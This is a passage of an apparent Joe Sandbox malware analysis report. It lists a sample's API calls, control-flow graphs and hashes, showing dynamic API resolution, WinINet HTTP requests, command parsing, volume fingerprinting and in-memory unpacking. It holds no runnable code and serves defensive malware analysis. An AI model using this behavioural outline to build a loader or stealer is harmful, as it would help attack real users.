                                            • GetProcAddress.KERNEL32(77190000,02DF9780), ref: 00419E44
                                            • GetProcAddress.KERNEL32(77190000,02DF68C0), ref: 00419E5D
                                            • GetProcAddress.KERNEL32(77190000,02DF9798), ref: 00419E75
                                            • GetProcAddress.KERNEL32(77190000,02E28C38), ref: 00419E8D
                                            • GetProcAddress.KERNEL32(77190000,02E28B18), ref: 00419EA6
                                            • GetProcAddress.KERNEL32(77190000,02E28DD0), ref: 00419EBE
                                            • GetProcAddress.KERNEL32(77190000,02E28D10), ref: 00419ED6
                                            • GetProcAddress.KERNEL32(77190000,02E28D28), ref: 00419EEF
                                            • GetProcAddress.KERNEL32(77190000,02E28C68), ref: 00419F07
                                            • GetProcAddress.KERNEL32(77190000,02E28CF8), ref: 00419F1F
                                            • GetProcAddress.KERNEL32(77190000,02E28B48), ref: 00419F38
                                            • GetProcAddress.KERNEL32(77190000,02DF4C40), ref: 00419F50
                                            • GetProcAddress.KERNEL32(77190000,02E28CB0), ref: 00419F68
                                            • GetProcAddress.KERNEL32(77190000,02E28D88), ref: 00419F81
                                            • GetProcAddress.KERNEL32(77190000,02DF6B00), ref: 00419F99
                                            • GetProcAddress.KERNEL32(77190000,02E28B90), ref: 00419FB1
                                            • GetProcAddress.KERNEL32(77190000,02DF6B20), ref: 00419FCA
                                            • GetProcAddress.KERNEL32(77190000,02E28DA0), ref: 00419FE2
                                            • GetProcAddress.KERNEL32(77190000,02E28C20), ref: 00419FFA
                                            • GetProcAddress.KERNEL32(77190000,02DF6BC0), ref: 0041A013
                                            • GetProcAddress.KERNEL32(77190000,02DF6B40), ref: 0041A02B
                                            • LoadLibraryA.KERNEL32(02E28CC8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                            • LoadLibraryA.KERNEL32(02E28D40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                            • LoadLibraryA.KERNEL32(02E28AE8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                            • LoadLibraryA.KERNEL32(02E28C50,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                            • LoadLibraryA.KERNEL32(02E28DB8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                            • LoadLibraryA.KERNEL32(02E28C80,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                            • LoadLibraryA.KERNEL32(02E28C98,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                            • LoadLibraryA.KERNEL32(02E28B00,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                            • GetProcAddress.KERNEL32(77040000,02DF6940), ref: 0041A0DA
                                            • GetProcAddress.KERNEL32(77040000,02E28BA8), ref: 0041A0F2
                                            • GetProcAddress.KERNEL32(77040000,02E26080), ref: 0041A10A
                                            • GetProcAddress.KERNEL32(77040000,02E28B30), ref: 0041A123
                                            • GetProcAddress.KERNEL32(77040000,02DF6520), ref: 0041A13B
                                            • GetProcAddress.KERNEL32(70630000,02DF42D0), ref: 0041A160
                                            • GetProcAddress.KERNEL32(70630000,02DF67E0), ref: 0041A179
                                            • GetProcAddress.KERNEL32(70630000,02DF4370), ref: 0041A191
                                            • GetProcAddress.KERNEL32(70630000,02E28B60), ref: 0041A1A9
                                            • GetProcAddress.KERNEL32(70630000,02E28BF0), ref: 0041A1C2
                                            • GetProcAddress.KERNEL32(70630000,02DF6660), ref: 0041A1DA
                                            • GetProcAddress.KERNEL32(70630000,02DF66A0), ref: 0041A1F2
                                            • GetProcAddress.KERNEL32(70630000,02E28C08), ref: 0041A20B
                                            • GetProcAddress.KERNEL32(768D0000,02DF6800), ref: 0041A22C
                                            • GetProcAddress.KERNEL32(768D0000,02DF6820), ref: 0041A244
                                            • GetProcAddress.KERNEL32(768D0000,02E28CE0), ref: 0041A25D
                                            • GetProcAddress.KERNEL32(768D0000,02E28D58), ref: 0041A275
                                            • GetProcAddress.KERNEL32(768D0000,02DF6880), ref: 0041A28D
                                            • GetProcAddress.KERNEL32(75790000,02DF4208), ref: 0041A2B3
                                            • GetProcAddress.KERNEL32(75790000,02DF4230), ref: 0041A2CB
                                            • GetProcAddress.KERNEL32(75790000,02E28B78), ref: 0041A2E3
                                            • GetProcAddress.KERNEL32(75790000,02DF6680), ref: 0041A2FC
                                            • GetProcAddress.KERNEL32(75790000,02DF6760), ref: 0041A314
                                            • GetProcAddress.KERNEL32(75790000,02DF4078), ref: 0041A32C
                                            • GetProcAddress.KERNEL32(75A10000,02E28D70), ref: 0041A352
                                            • GetProcAddress.KERNEL32(75A10000,02DF64C0), ref: 0041A36A
                                            • GetProcAddress.KERNEL32(75A10000,02E25FF0), ref: 0041A382
                                            • GetProcAddress.KERNEL32(75A10000,02E28BC0), ref: 0041A39B
                                            • GetProcAddress.KERNEL32(75A10000,02E28BD8), ref: 0041A3B3
                                            • GetProcAddress.KERNEL32(75A10000,02DF6840), ref: 0041A3CB
                                            • GetProcAddress.KERNEL32(75A10000,02DF6540), ref: 0041A3E4
                                            • GetProcAddress.KERNEL32(75A10000,02E28E90), ref: 0041A3FC
                                            • GetProcAddress.KERNEL32(75A10000,02E28E30), ref: 0041A414
                                            • GetProcAddress.KERNEL32(76850000,02DF6860), ref: 0041A436
                                            • GetProcAddress.KERNEL32(76850000,02E28E78), ref: 0041A44E
                                            • GetProcAddress.KERNEL32(76850000,02E28E18), ref: 0041A466
                                            • GetProcAddress.KERNEL32(76850000,02E28DE8), ref: 0041A47F
                                            • GetProcAddress.KERNEL32(76850000,02E28EA8), ref: 0041A497
                                            • GetProcAddress.KERNEL32(75690000,02DF6720), ref: 0041A4B8
                                            • GetProcAddress.KERNEL32(75690000,02DF64A0), ref: 0041A4D1
                                            • GetProcAddress.KERNEL32(769C0000,02DF64E0), ref: 0041A4F2
                                            • GetProcAddress.KERNEL32(769C0000,02E28E48), ref: 0041A50A
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF6500), ref: 0041A530
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF66E0), ref: 0041A548
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF6580), ref: 0041A560
                                            • GetProcAddress.KERNEL32(6F8C0000,02E28E60), ref: 0041A579
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF65C0), ref: 0041A591
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF6780), ref: 0041A5A9
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF6740), ref: 0041A5C2
                                            • GetProcAddress.KERNEL32(6F8C0000,02DF67C0), ref: 0041A5DA
                                            • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0041A5F1
                                            • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0041A607
                                            • GetProcAddress.KERNEL32(75D90000,02E28E00), ref: 0041A629
                                            • GetProcAddress.KERNEL32(75D90000,02E26100), ref: 0041A641
                                            • GetProcAddress.KERNEL32(75D90000,02E291F0), ref: 0041A659
                                            • GetProcAddress.KERNEL32(75D90000,02E29358), ref: 0041A672
                                            • GetProcAddress.KERNEL32(76470000,02DF6640), ref: 0041A693
                                            • GetProcAddress.KERNEL32(70220000,02E29418), ref: 0041A6B4
                                            • GetProcAddress.KERNEL32(70220000,02DF6560), ref: 0041A6CD
                                            • GetProcAddress.KERNEL32(70220000,02E294C0), ref: 0041A6E5
                                            • GetProcAddress.KERNEL32(70220000,02E29310), ref: 0041A6FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                            • API String ID: 2238633743-1775429166
                                            • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                            • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                            • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                            • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1026 406407-406427 call 41a740 call 41a800 * 2 1024->1026 1027 40642c-40644b call 418940 1024->1027 1025->1024 1026->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1035 1036 40644d-406454 1027->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                            • StrCmpCA.SHLWAPI(?,02E26370), ref: 00406303
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                            • HttpOpenRequestA.WININET(00000000,GET,?,02E2A4E0,00000000,00000000,00400100,00000000), ref: 00406385
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                            • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                            • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                            • InternetCloseHandle.WININET(00000000), ref: 00406503
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID: ERROR$ERROR$GET
                                            • API String ID: 3074848878-2509457195
                                            • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                            • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                            • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                            • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1095 4118c0-4118c3 1074->1095 1096 4118ca 1074->1096 1097 4118e2-4118e5 1075->1097 1098 4118ec 1075->1098 1076->1070 1099 411904-411907 1077->1099 1100 41190e 1077->1100 1105 411964-411967 1078->1105 1106 41196e 1078->1106 1086 411983-411986 1079->1086 1087 41198d 1079->1087 1101 411930 1080->1101 1102 411926-411929 1080->1102 1103 411945-411948 1081->1103 1104 41194f 1081->1104 1082->1070 1091 411870-411873 1083->1091 1092 41187a 1083->1092 1093 411892-41189c 1084->1093 1094 41189e-4118a1 1084->1094 1086->1087 1087->1070 1091->1092 1092->1070 1110 4118a8 1093->1110 1094->1110 1095->1096 1096->1070 1097->1098 1098->1070 1099->1100 1100->1070 1101->1070 1102->1101 1103->1104 1104->1070 1105->1106 1106->1070 1110->1070
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID: block
                                            • API String ID: 3407564107-2199623458
                                            • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                            • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                            • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                            • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1169 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1169 1170 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1170 1169->1164 1170->1164 1270 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1170->1270 1184->1291 1191 415872-415879 1185->1191 1192 41598f-415a14 call 41aad0 StrCmpCA 1185->1192 1199 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1191->1199 1200 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1191->1200 1220 415a16-415a21 Sleep 1192->1220 1221 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1192->1221 1199->1192 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1199->1296 1200->1192 1220->1127 1221->1291 1270->1164 1296->1192
                                            APIs
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E24D60,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                              • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                              • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                            • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                            • API String ID: 3630751533-2791005934
                                            • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                            • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                            • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                            • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                            • wsprintfA.USER32 ref: 00417640
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 3790021787-3809124531
                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1344 302003c-3020047 1345 3020049 1344->1345 1346 302004c-3020263 call 3020a3f call 3020e0f call 3020d90 VirtualAlloc 1344->1346 1345->1346 1361 3020265-3020289 call 3020a69 1346->1361 1362 302028b-3020292 1346->1362 1366 30202ce-30203c2 VirtualProtect call 3020cce call 3020ce7 1361->1366 1363 30202a1-30202b0 1362->1363 1365 30202b2-30202cc 1363->1365 1363->1366 1365->1363 1373 30203d1-30203e0 1366->1373 1374 30203e2-3020437 call 3020ce7 1373->1374 1375 3020439-30204b8 VirtualFree 1373->1375 1374->1373 1377 30205f4-30205fe 1375->1377 1378 30204be-30204cd 1375->1378 1380 3020604-302060d 1377->1380 1381 302077f-3020789 1377->1381 1379 30204d3-30204dd 1378->1379 1379->1377 1385 30204e3-3020505 LoadLibraryA 1379->1385 1380->1381 1386 3020613-3020637 1380->1386 1383 30207a6-30207b0 1381->1383 1384 302078b-30207a3 1381->1384 1388 30207b6-30207cb 1383->1388 1389 302086e-30208be LoadLibraryA 1383->1389 1384->1383 1390 3020517-3020520 1385->1390 1391 3020507-3020515 1385->1391 1392 302063e-3020648 1386->1392 1393 30207d2-30207d5 1388->1393 1396 30208c7-30208f9 1389->1396 1394 3020526-3020547 1390->1394 1391->1394 1392->1381 1395 302064e-302065a 1392->1395 1397 30207d7-30207e0 1393->1397 1398 3020824-3020833 1393->1398 1399 302054d-3020550 1394->1399 1395->1381 1400 3020660-302066a 1395->1400 1401 3020902-302091d 1396->1401 1402 30208fb-3020901 1396->1402 1403 30207e2 1397->1403 1404 30207e4-3020822 1397->1404 1408 3020839-302083c 1398->1408 1405 30205e0-30205ef 1399->1405 1406 3020556-302056b 1399->1406 1407 302067a-3020689 1400->1407 1402->1401 1403->1398 1404->1393 1405->1379 1409 302056f-302057a 1406->1409 1410 302056d 1406->1410 1411 3020750-302077a 1407->1411 1412 302068f-30206b2 1407->1412 1408->1389 1413 302083e-3020847 1408->1413 1415 302059b-30205bb 1409->1415 1416 302057c-3020599 1409->1416 1410->1405 1411->1392 1417 30206b4-30206ed 1412->1417 1418 30206ef-30206fc 1412->1418 1419 302084b-302086c 1413->1419 1420 3020849 1413->1420 1427 30205bd-30205db 1415->1427 1416->1427 1417->1418 1421 302074b 1418->1421 1422 30206fe-3020748 1418->1422 1419->1408 1420->1389 1421->1407 1422->1421 1427->1399
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0302024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: 71698f9dead60e1012e55ad624e79ff464b0c3ea82b59a3cae9379ec681f7b96
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 01526A75A01229DFDBA4CF58C984BADBBB5BF09304F1480D9E94DAB351DB30AA85CF14

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9B70), ref: 004198A1
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9E70), ref: 004198BA
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9E10), ref: 004198D2
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9E58), ref: 004198EA
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9DB0), ref: 00419903
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02E24D30), ref: 0041991B
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF6C00), ref: 00419933
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF6BE0), ref: 0041994C
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9DF8), ref: 00419964
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9DC8), ref: 0041997C
